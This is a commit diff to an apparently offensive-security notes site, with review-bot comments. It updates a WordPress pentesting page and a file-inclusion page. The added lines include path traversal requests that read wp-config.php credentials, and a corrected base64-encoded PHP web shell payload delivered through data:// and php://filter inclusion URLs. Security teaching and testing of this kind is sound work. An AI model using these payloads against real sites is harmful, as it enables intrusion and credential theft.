Commit ceba022

updated
1 parent 198c741 commit ceba022

2 files changed

+19
-5
lines changed

src/exploit/web/cms/wordpress-pentesting.md

Lines changed: 16 additions & 2 deletions
@@ -5,7 +5,7 @@ tags:
55
- CMS
66
- Web
77
refs:
8-
date: 2024-05-01
8+
date: 2025-01-30
99
draft: false
1010
---
1111

@@ -56,7 +56,7 @@ There is the meta tag for WordPress in the head tag of the HTML source code.
5656

5757
<br />
5858

59-
## Common Directories
59+
## Interesting Directories/Files
6060

6161
```sh
6262
/author/admin/
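Review bot: The rename at new line 59 from `## Common Directories` to `## Interesting Directories/Files` changes the heading text, so if other pages link to this section by its heading anchor, those links should be checked and updated in the same commit. The block under it is fenced as `sh` although it lists URL paths rather than shell commands; a plain-text fence would describe it better.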
@@ -68,6 +68,7 @@ There is the meta tag for WordPress in the head tag of the HTML source code.
6868
/wp-admin/
6969
/wp-admin/admin-ajax.php
7070
/wp-admin/upload.php
71+
/wp-config.php
7172
/wp-content/
7273
/wp-content/uploads/
7374
/wp-includes/
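Review bot: `/wp-config.php` at new line 71 is added to the list with no indication of why it matters. A one-line comment saying that it holds the site's database credentials and secret keys, and that a correctly configured server never returns its source, would tell the reader how to interpret a response for this path and gives site owners the matching check.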
@@ -101,6 +102,19 @@ admin:password
101102

102103
<br />
103104

105+
## Path Traversal
106+
107+
Check if the WordPress version or the plugin is vulnerable to path traversal. For example:
108+
109+
```bash
110+
/wp-content/plugins/<plugin_name>/<plugin_name>.php?someParam=../../../../wp-config.php
111+
/wp-content/plugins/<plugin_name>/<plugin_name>.php?someParam=php://filter/resource=../../../../wp-config.php
112+
/wp-content/plugins/<plugin_name>/php/<plugin_name>.php?someParam=../../../../wp-config.php
113+
/wp-content/plugins/<plugin_name>/php/<plugin_name>.php?someParam=php://filter/resource=../../../../wp-config.php
114+
```
115+
116+
<br />
117+
104118
## Reverse Shell
105119

106120
To achieve reverse shell, we need the admin credential.
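Review bot: The parameter placeholder in the four added URLs (new lines 110 to 113) is written as bare `someParam` while the plugin name uses the `<plugin_name>` form, so a reader cannot tell whether `someParam` is meant literally; write it as `<param>` to match. The block is fenced as `bash` but contains request paths, not commands, and the intro sentence at new line 107 says "the plugin" without saying which plugin is meant or how the check is done. The two `php://filter` lines overlap with file-inclusion.md, which is touched in this same commit, so a link to that page would be better than a second copy. The section would also benefit from a closing line on the fix: validate the file parameter against an allow-list of names and keep plugins updated.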

src/exploit/web/security-risk/file-inclusion.md

Lines changed: 3 additions & 3 deletions
@@ -5,7 +5,7 @@ tags:
55
- Web
66
refs:
77
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion
8-
date: 2024-12-12
8+
date: 2025-01-30
99
draft: false
1010
---
1111

@@ -77,8 +77,8 @@ draft: false
7777
# PHP Filter (Base64 encoding)
7878
# `PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+`: `<?php system($_GET['cmd']); ?>`
7979
?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+&cmd=whoami
80-
# `AgZWNobyAiJF9HRVRbJ2NtZCddIjsgPz4`: `<?php echo system($_GET['cmd']); ?>`
81-
?page=php://filter/convert.base64-decode/resource=data://plain/text,AgZWNobyAiJF9HRVRbJ2NtZCddIjsgPz4=&cmd=whoami
80+
# `PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4=`: `<?php echo system($_GET['cmd']); ?>`
81+
?page=php://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4=&cmd=whoami
8282

8383
# PHP Session File
8484
?page=/var/lib/php/sessions/sess_<PHPSESSID>
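Review bot: The corrected line 81 still writes the data URI media type as `data://plain/text,` while line 79 just above uses `data://text/plain;base64,`; use `text/plain` in both so the two examples are consistent. The comment at line 77 also labels this group "Base64 encoding" although the filter on line 81 is `convert.base64-decode`, which is worth rewording while this line is being touched. The new Base64 string does decode to the PHP snippet quoted in the comment on line 80, so the comment and the URL now agree.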
